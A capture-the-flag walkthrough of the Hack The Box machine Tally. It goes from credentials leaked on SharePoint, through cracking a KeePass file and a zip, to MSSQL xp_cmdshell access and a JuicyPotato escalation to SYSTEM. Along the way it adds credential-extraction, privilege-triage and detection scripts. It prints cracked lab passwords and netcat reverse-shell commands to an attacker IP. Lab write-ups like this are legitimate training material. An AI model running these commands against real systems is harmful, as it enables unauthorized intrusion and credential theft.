HTB - Tally

Getting Root

  1. We find files on the SharePoint site that contain credentials for the FTP server.

  2. From FTP we retrieve a KeePass database. The credentials inside it give read access to an SMB share holding a password-protected zip with an Orchard CMS dump and a binary, tester.exe, with the SQL Server sa password hard-coded in it. With sa we enable xp_cmdshell and get a shell.

  3. The user sarah has SeImpersonatePrivilege, which is easily abused with RottenPotato/JuicyPotato to get SYSTEM.

Tools Used:

nmap, dirsearch.py, ncftp, keepass2john, zip2john, john, crackmapexec, smbclient, strings, impacket-mssqlclient.py, impacket-smbserver, nc.exe, JuicyPotato

Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 20:22 EDT                                                                                                                               
Nmap scan report for tally.htb (10.10.10.59)                                                                                                                                                  
Host is up (0.12s latency).                                                                                                                                                                   
                                                                                                                                                                                              
PORT      STATE SERVICE            VERSION                                                                                                                                                    
21/tcp    open  ftp                Microsoft ftpd                                                                                                                                             
| ftp-syst:                                                                                                                                                                                   
|_  SYST: Windows_NT                                                                                                                                                                          
80/tcp    open  http               Microsoft IIS httpd 10.0                                                                                                                                   
| http-ntlm-info:                                                                                                                                                                             
|   Target_Name: TALLY                                                                                                                                                                        
|   NetBIOS_Domain_Name: TALLY                                                                                                                                                                
|   NetBIOS_Computer_Name: TALLY                                                                                                                                                              
|   DNS_Domain_Name: TALLY                                                                                                                                                                    
|   DNS_Computer_Name: TALLY                                                                                                                                                                  
|_  Product_Version: 10.0.14393                                                                                                                                                               
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                      
| http-title: Home                                                                                                                                                                            
|_Requested resource was http://tally.htb/_layouts/15/start.aspx#/default.aspx                                                                                                                
81/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                    
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_http-title: Bad Request                                                                                                                                                                     
135/tcp   open  msrpc              Microsoft Windows RPC                                                                                                                                      
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn                                                                                                                              
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds                                                                                                       
808/tcp   open  ccproxy-http?                                                                                                                                                                 
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM                                                                                                               
| ms-sql-ntlm-info:                                                                                                                                                                           
|   Target_Name: TALLY                                                                                                                                                                        
|   NetBIOS_Domain_Name: TALLY                                                                                                                                                                
|   NetBIOS_Computer_Name: TALLY                                                                                                                                                              
|   DNS_Domain_Name: TALLY                                                                                                                                                                    
|   DNS_Computer_Name: TALLY                                                                                                                                                                  
|_  Product_Version: 10.0.14393                                                                                                                                                               
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback                                                                                                                                      
| Not valid before: 2020-04-05T22:22:49                                                                                                                                                       
|_Not valid after:  2050-04-05T22:22:49                                                                                                                                                       
|_ssl-date: 2020-04-06T00:25:52+00:00; +56s from scanner time.                                                                                                                                
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                    
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_http-title: Not Found                              
15567/tcp open  http               Microsoft IIS httpd 10.0                                                                                                                                   
| http-auth:                                                                                                                                                                                  
| HTTP/1.1 401 Unauthorized\x0D                                                                                                                                                               
|   Negotiate                                                                                                                                                                                 
|_  NTLM                                                                                                                                                                                      
| http-ntlm-info:                                                                                                                                                                             
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2020-04-06T00:25:51+00:00; +55s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  unknown
49666/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49669/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 55s, deviation: 0s, median: 54s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-06T00:25:00
|_  start_date: 2020-04-05T22:22:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.20 seconds

Enumeration

HTTP - Port 80

Dirsearch.py

#python3 /opt/dirsearch/dirsearch.py -u http://tally.htb -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -E                                                               
                                                                                                                                                                                              
 _|. _ _  _  _  _ _|_    v0.3.9                                                                                                                                                               
(_||| _) (/_(_|| (_| )                                                                                                                                                                        
                                                                                                                                                                                              
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 1708                                                                                  
                                                                                                                                                                                              
Error Log: /opt/dirsearch/logs/errors-20-04-05_23-09-45.log                                                                                                                                   
                                                                                                                                                                                              
Target: http://tally.htb  
[23:16:08] 302 -  143B  - /_layouts/viewedit.aspx  ->  /_layouts/15/viewedit.aspx                                                                                                             
[23:16:08] 302 -  143B  - /_layouts/viewlsts.aspx  ->  /_layouts/15/viewlsts.aspx                                                                                                             
[23:16:08] 302 -  143B  - /_layouts/versions.aspx  ->  /_layouts/15/versions.aspx 

Visiting /_layouts/viewlsts.aspx (SharePoint's Site Contents page) lists every list and document library on the site, and we reach it without any credentials.

Found Documents with Credentials

The Documents library contains a file with the FTP details.

FTP details:

Password: UTDRSCH53c"$6hys

Checking under Site Pages, we notice another page named Finance Team.

Its contents mention the username ftp_user.

FTP - Port 21

We can successfully login using ftp_user and the password we found earlier.

# ncftp -u ftp_user -p 'UTDRSCH53c"$6hys' 10.10.10.59
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.59...                                                                                                                                                                  
Microsoft FTP Service
Logging in...                                                                                                                                                                                 
User logged in.
Logged in to 10.10.10.59.                                                                                                                                                                     
ncftp / > ls
From-Custodian/  Intranet/        Logs/            To-Upload/       User/
ncftp / > 

Found KeePass File

Under /User/Tim/Files we find a KeePass database, tim.kdbx:

ncftp /User/Tim > cd Files/                                                                                                                                                                   
ncftp /User/Tim/Files > ls                                                                                                                                                                    
bonus.txt      KeePass-2.36/  tim.kdbx    

Cracking the KeePass password

# keepass2john tim.kdbx > tim_hash
# sudo john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt tim_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo    (tim)
1g 0:00:00:11 DONE (2020-04-06 01:09) 0.08718g/s 2153p/s 2153c/s 2153C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Opening tim.kdbx with the master password simplementeyo reveals a stored credential, which we try against SMB next:

Username: Finance Password: Acc0unting

SMB - Port 445

Checking the credentials with crackmapexec (cme) confirms they are valid for SMB, and the share listing shows read access to the ACCT share.

# crackmapexec smb 10.10.10.59 -u finance -p Acc0unting --shares
SMB         10.10.10.59     445    TALLY            [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB         10.10.10.59     445    TALLY            [+] TALLY\finance:Acc0unting 
SMB         10.10.10.59     445    TALLY            [+] Enumerated shares
SMB         10.10.10.59     445    TALLY            Share           Permissions     Remark
SMB         10.10.10.59     445    TALLY            -----           -----------     ------
SMB         10.10.10.59     445    TALLY            ACCT            READ            
SMB         10.10.10.59     445    TALLY            ADMIN$                          Remote Admin
SMB         10.10.10.59     445    TALLY            C$                              Default share
SMB         10.10.10.59     445    TALLY            IPC$                            Remote IPC

Found a zip file on the ACCT share

Browsing the share with smbclient, under \zz_Migration\Backup\20170808\orcharddb we find a backup of the Orchard CMS database:

smb: \zz_Migration\Backup\20170808\orcharddb\> ls                                                                                                                                             
  .                                   D        0  Sun Sep  3 10:23:16 2017                                                                                                                    
  ..                                  D        0  Sun Sep  3 10:23:16 2017                                                                                                                    
  orcharddb.zip                       A     1012  Sun Sep  3 10:23:07 2017   

Cracking the zip file

# zip2john orcharddb.zip > orchard_hash
# john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt orchard_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Acc0unting       (orcharddb.zip/orcharddb.sql)
1g 0:00:00:00 DONE (2020-04-06 02:24) 1.010g/s 11551Kp/s 11551Kc/s 11551KC/s Aimeerose83..Abdouhabibi
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The archive is protected with Acc0unting, the same password that guarded the share, so every credential found so far is worth trying against each new lock. Unzipping orcharddb.zip yields orcharddb.sql, an Orchard CMS database dump; its Users table stores the admin password in clear text (PasswordFormat 'Clear'):

([Id], [UserName], [Email], [NormalizedUserName], [Password], [PasswordFormat], [HashAlgorithm], [PasswordSalt], [RegistrationStatus], [EmailStatus], [EmailChallengeToken])  
(2, N'admin', N'', N'admin', N'Finance2', N'Clear', N'SHA1', N's2Ieb5Pn7Vwf+X6JEXJitg==', N'Approved', N'Approved', NULL)

Found tester.exe

smb: \zz_Migration\Binaries\New Folder\> ls
  .                                   D        0  Thu Sep 21 02:21:09 2017
  ..                                  D        0  Thu Sep 21 02:21:09 2017
  crystal_reports_viewer_2016_sp04_51051980.zip      A 389188014  Wed Sep 13 15:56:38 2017
  Macabacus2016.exe                   A 18159024  Mon Sep 11 17:20:05 2017
  Orchard.Web.1.7.3.zip               A 21906356  Tue Aug 29 19:27:42 2017
  putty.exe                           A   774200  Sun Sep 17 16:19:26 2017
  RpprtSetup.exe                      A   483824  Fri Sep 15 15:49:46 2017
  tableau-desktop-32bit-10-3-2.exe      A 254599112  Mon Sep 11 17:13:14 2017
  tester.exe                          A   215552  Fri Sep  1 07:15:54 2017
  vcredist_x64.exe                    A  7194312  Wed Sep 13 16:06:28 2017

                8387839 blocks of size 4096. 714594 blocks available
smb: \zz_Migration\Binaries\New Folder\> get tester.exe 
getting file \zz_Migration\Binaries\New Folder\tester.exe of size 215552 as tester.exe (357.4 KiloBytes/sec) (average 357.4 KiloBytes/sec)
smb: \zz_Migration\Binaries\New Folder\> 

Running strings over the binary reveals a hard-coded ODBC connection string with the sa password embedded in it:

# strings tester.exe
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G; 

Creds:

sa:GWE3V65#6KFH93@4GWTG2G
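
The strings run above only shows ASCII literals; a password stored as a UTF-16LE string, which is how .NET and many Unicode Win32 builds keep their literals, stays hidden unless you also run strings -el. The following is an added example, not from the original writeup: a small Python scanner that checks both encodings and parses each connection string it finds into fields so the credential values can be pulled out directly. The SAMPLE_BINARY bytes are constructed; the ASCII string is the one found in tester.exe, while the UTF-16LE string (user orchard_app, password Example-Only) is hypothetical and only there to show what a default strings run misses.

```python
"""Pull ODBC/ADO-style connection strings out of a binary, ASCII or UTF-16LE."""
import re
from typing import Dict, Iterator, List, Tuple

# One KEY=VALUE pair: key is letters/spaces, value is printable ASCII minus ';'
# (0x20-0x3a and 0x3c-0x7e). Brace-quoted values that themselves contain ';'
# are allowed by ODBC but not handled here; they are rare in embedded strings.
_PAIR = r"[A-Za-z][A-Za-z ]{0,30}=[ -:<-~]{1,200}"
# At least one ';'-terminated pair, optionally followed by a final unterminated one.
CONN_RE = re.compile(rf"(?:{_PAIR};[ \t]*)+(?:{_PAIR})?")

# Keys that make a match worth reporting as a credential.
CREDENTIAL_KEYS = {"PWD", "PASSWORD", "UID", "USER ID"}


def _text_views(data: bytes) -> Iterator[Tuple[str, str]]:
    """Yield (encoding, text): the raw bytes as Latin-1 (the ASCII view) and
    both UTF-16LE alignments, since a wide string may start at an odd offset."""
    yield "ascii", data.decode("latin-1")
    for offset in (0, 1):
        yield "utf-16le", data[offset:].decode("utf-16-le", errors="ignore")


def parse_connection_string(raw: str) -> Dict[str, str]:
    """Split 'K1=V1;K2=V2;' into {'K1': 'V1', 'K2': 'V2'} with upper-cased keys."""
    fields: Dict[str, str] = {}
    for part in raw.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().upper()] = value.strip()
    return fields


def find_connection_strings(data: bytes) -> List[Dict]:
    """Return every distinct connection string that carries a credential field."""
    hits: List[Dict] = []
    seen = set()
    for encoding, text in _text_views(data):
        for match in CONN_RE.finditer(text):
            raw = match.group(0).strip()
            fields = parse_connection_string(raw)
            if len(fields) < 2 or not (fields.keys() & CREDENTIAL_KEYS):
                continue
            signature = tuple(sorted(fields.items()))
            if signature in seen:  # same string seen at another alignment
                continue
            seen.add(signature)
            hits.append({"encoding": encoding, "raw": raw, "fields": fields})
    return hits


# Constructed stand-in for tester.exe: a fake PE header, the ASCII connection
# string that strings(1) found on the box, and a second, hypothetical string
# stored as UTF-16LE that a default strings(1) run would not show.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 12 + b".rdata\x00"
    + b"DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G; "
    + b"\x00" * 7
    + "Data Source=TALLY;Initial Catalog=orcharddb;User ID=orchard_app;Password=Example-Only;".encode("utf-16-le")
    + b"\x00\x00"
)

if __name__ == "__main__":
    for hit in find_connection_strings(SAMPLE_BINARY):
        creds = {k: v for k, v in hit["fields"].items() if k in CREDENTIAL_KEYS}
        print(f"[{hit['encoding']}] {creds}")
```

Run it against a real file with find_connection_strings(open(path, "rb").read()); on a .NET binary the UTF-16LE view is usually the one that pays off.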

Exploitation:

python /opt/impacket/examples/mssqlclient.py sa:'GWE3V65#6KFH93@4GWTG2G'@10.10.10.59 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665) 
[!] Press help for extra shell commands
SQL> 

Getting a shell

SQL> help                                                                                                                                                                                     
                                                                                                                                                                                              
     lcd {path}                 - changes the current local directory to {path}                                                                                                               
     exit                       - terminates the server process (and this session)                                                                                                            
     enable_xp_cmdshell         - you know what it means                                                                                                                                      
     disable_xp_cmdshell        - you know what it means                                                                                                                                      
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell                                                                                                                              
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)                                                                                                             
     ! {cmd}                    - executes a local shell cmd                                                                                                                                  
                                                                                                                                                                                              
SQL> enable_xp_cmdshell                                                                                                                                                                       
[*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.                                                        
[*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.                                                                  
SQL> enable_xp_cmdshell 1                                                                                                                                                                     
[*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.                                                        
[*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.                                                                  
SQL> RECONFIGURE     
SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

tally\sarah                                                                        

                               

Copy nc.exe to the box using impacket-smbserver. The share is hosted on the attacking machine; the SQL Server service account fetches the binary over SMB, and the reverse shell it launches runs as that account.

On my Kali box
# impacket-smbserver share $(pwd)


On Tally
SQL> xp_cmdshell net use p: \\10.10.14.55\share
SQL> xp_cmdshell copy p:\nc.exe c:\temp
SQL> xp_cmdshell c:\temp\nc.exe -e cmd.exe 10.10.14.55 9001


On my Kali box, the listener catches a shell. It runs as tally\sarah, the account the SQL Server service runs under, because xp_cmdshell executes in the service's own context:
# rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49907.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
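
Detection side, as an added example that is not part of the original writeup: the chain above leaves two reliable traces. SQL Server writes "Configuration option 'xp_cmdshell' changed from X to 1" (message 15457) to its ERRORLOG on every sp_configure call, including a 1-to-1 re-enable like the second one shown, and the command itself runs as a child of sqlservr.exe, which normally never spawns cmd.exe. The ERRORLOG lines and Sysmon-style process records below are constructed to mirror what was done on Tally; the SQL Server install path is the default for a 2016 instance.

```python
"""Flag xp_cmdshell enablement in ERRORLOG and shells spawned by sqlservr.exe."""
import re
from typing import Dict, List

OPTION_RE = re.compile(
    r"Configuration option '(?P<option>xp_cmdshell|Ole Automation Procedures)' "
    r"changed from (?P<old>\d) to (?P<new>\d)"
)
SQL_IMAGE = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line fragments from the walkthrough's tooling transfer and reverse shell.
HIGH_RISK_ARGS = ("net use", "nc.exe", "-e cmd", "\\\\")


def scan_errorlog(lines: List[str]) -> List[Dict]:
    """Flag every attempt to turn on xp_cmdshell / OLE automation.
    A '1 to 1' transition is still an attempt and is still flagged."""
    alerts = []
    for line in lines:
        m = OPTION_RE.search(line)
        if m and m.group("new") == "1":
            alerts.append({
                "rule": "mssql_dangerous_option_enabled",
                "option": m.group("option"),
                "already_on": m.group("old") == "1",
                "line": line.strip(),
            })
    return alerts


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def scan_process_events(events: List[Dict]) -> List[Dict]:
    """Flag any child of sqlservr.exe; grade by the child image and its arguments."""
    alerts = []
    for ev in events:
        if _basename(ev["ParentImage"]) != SQL_IMAGE:
            continue
        image = _basename(ev["Image"])
        cmdline = ev.get("CommandLine", "").lower()
        severity = "medium" if image in SHELLS else "low"
        if any(frag in cmdline for frag in HIGH_RISK_ARGS):
            severity = "high"
        alerts.append({
            "rule": "mssql_child_process",
            "severity": severity,
            "image": image,
            "user": ev.get("User", ""),
            "cmdline": ev.get("CommandLine", ""),
        })
    return alerts


# Constructed ERRORLOG lines mirroring the INFO messages mssqlclient printed.
SAMPLE_ERRORLOG = [
    "2020-04-06 00:30:11.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2020-04-06 00:30:11.14 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2020-04-06 00:30:30.02 spid55      Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.",
    "2020-04-06 00:35:00.00 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]
# Constructed Sysmon Event ID 1 style records for the commands run via xp_cmdshell.
_SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_PROCESS_EVENTS = [
    {"ParentImage": _SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "User": r"TALLY\sarah"},
    {"ParentImage": _SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c net use p: \\10.10.14.55\share", "User": r"TALLY\sarah"},
    {"ParentImage": _SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9001", "User": r"TALLY\sarah"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe", "User": r"TALLY\sarah"},  # benign, not a SQL child
]

if __name__ == "__main__":
    for alert in scan_errorlog(SAMPLE_ERRORLOG) + scan_process_events(SAMPLE_PROCESS_EVENTS):
        print(alert)
```

The process rule is deliberately broad: any child of sqlservr.exe is an event, and the command line only adjusts severity, since a legitimate admin enabling xp_cmdshell for a maintenance job looks identical in the ERRORLOG.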

Privilege Escalation

The user sarah holds SeImpersonatePrivilege (and SeAssignPrimaryTokenPrivilege), which is exactly what JuicyPotato needs to turn a coerced SYSTEM token into a SYSTEM process:

c:\TEMP>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
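
Before reaching for a Potato it is worth triaging the whole token rather than eyeballing one line. The following is an added example, not from the page: a parser for whoami /priv output that flags the privileges with a known route to SYSTEM. Disabled in the State column only means the privilege is not currently enabled in the token; it is still held and a process can enable it, so SeAssignPrimaryTokenPrivilege counts just as much as SeImpersonatePrivilege. The HIGH_VALUE table is the editor's summary of well-known abuse paths; the input is sarah's output as printed above.

```python
"""Triage a `whoami /priv` dump for privileges that lead to SYSTEM."""
import re
from typing import Dict, List

# Privilege -> why it matters to an attacker holding it (well-known abuse paths).
HIGH_VALUE = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM token coerced over DCOM/named pipes (RottenPotato, JuicyPotato, PrintSpoofer)",
    "SeAssignPrimaryTokenPrivilege": "start a process with a stolen primary token (same Potato family, CreateProcessAsUser path)",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM/SYSTEM hives)",
    "SeRestorePrivilege": "write any file regardless of ACL (service binaries, DLL planting)",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant yourself access",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Row layout: "Privilege Name   Description   State"; the description is free
# text with spaces, so anchor on the state word at the end of the line.
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str) -> Dict[str, Dict[str, str]]:
    """Return {privilege: {'description': ..., 'state': ...}} from whoami /priv output."""
    privs: Dict[str, Dict[str, str]] = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.strip())
        if m:
            privs[m.group(1)] = {"description": m.group(2), "state": m.group(3)}
    return privs


def triage(text: str) -> List[Dict[str, str]]:
    """List the held privileges with a known path to SYSTEM, in dump order,
    regardless of whether they are currently Enabled or Disabled."""
    return [
        {"privilege": name, "state": info["state"], "abuse": HIGH_VALUE[name]}
        for name, info in parse_whoami_priv(text).items()
        if name in HIGH_VALUE
    ]


# sarah's token as printed on the box (copied from the walkthrough above).
SARAH_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for hit in triage(SARAH_PRIV):
        print(f"{hit['privilege']} ({hit['state']}): {hit['abuse']}")
```

Paste the output of whoami /priv from any foothold into triage(); on a service account like this one, two hits in the Potato family is the expected result.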

We copied JuicyPotato (jp.exe) to the target the same way as nc.exe. The first attempt did not return a shell: JuicyPotato needs the CLSID of a DCOM server that runs as SYSTEM on this particular Windows build, and which ones are usable varies by version. After trying other CLSIDs from the list linked below for this build, we got a shell.

CLSIDs that worked: UsoSvc {E7299E79-75E5-47BB-A03D-6D319FB7F886} and {B91D5831-B1BD-4608-8198-D72E155020F7}; the run below uses {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}, which also returned SYSTEM.

http://ohpe.it/juicy-potato/CLSID/

c:\TEMP>.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
Testing {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381} 1337
......
[+] authresult 0
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\TEMP>

Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9005
Ncat: Listening on 0.0.0.0:9005
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49979.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
